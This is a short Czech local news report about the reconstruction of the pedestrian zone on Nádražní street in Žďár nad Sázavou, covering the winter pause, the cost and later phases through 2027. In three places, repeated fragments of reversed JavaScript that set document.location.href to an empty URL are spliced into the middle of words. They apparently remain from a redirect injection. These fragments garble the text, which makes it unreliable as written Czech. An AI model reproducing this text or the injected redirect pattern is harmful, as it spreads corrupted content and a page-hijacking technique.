Rainbow page separator

Po úpravě povrchu pěší zóny bude stavba pokračovat na jaře

Sobota, 11. prosince 2021

Žďár nad Sázavou / I přes chladné počasí a občasné sněžení zatím pokračují stavební práce na rekonstrukci pěší zóny v Nádražní ulici. Technologická přestávka je naplánovaná zhruba od poloviny prosince do konce února, přičemž v zimním období je počítáno s úpravou povrchu ulice tak, aby se po ní dalo bezpečně chodit a mohla v ní být prováděna zimní údržba a zásobovány tamní provozovny.
Na jaře pak budou po dokončení výměny inženýrských sítí vedoucích pod povrchem včetně následného napojení jednotlivých nemovi[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tostí na nové rozvody stavební práce pokračovat. S finálním dokončením je počítáno v srpnu. Rekonstrukce, na které se podílí žďárská radnice a Svaz vodovodů a kanalizací Žďársko, byla vyčíslena na 24,8 milionu korun bez DPH.
Po modernizaci pěší zóny je v plánu obnova dalšího, v pořadí již třetího úseku Nádražní ulice, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to části od okružní křižovatky pod nádražím až k nádražní budově. Poslední částí stavby s předběžným termínem doho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovení v roce 2027 bude prostranství před nádražím a okolí vedlejší okružní křižovatky.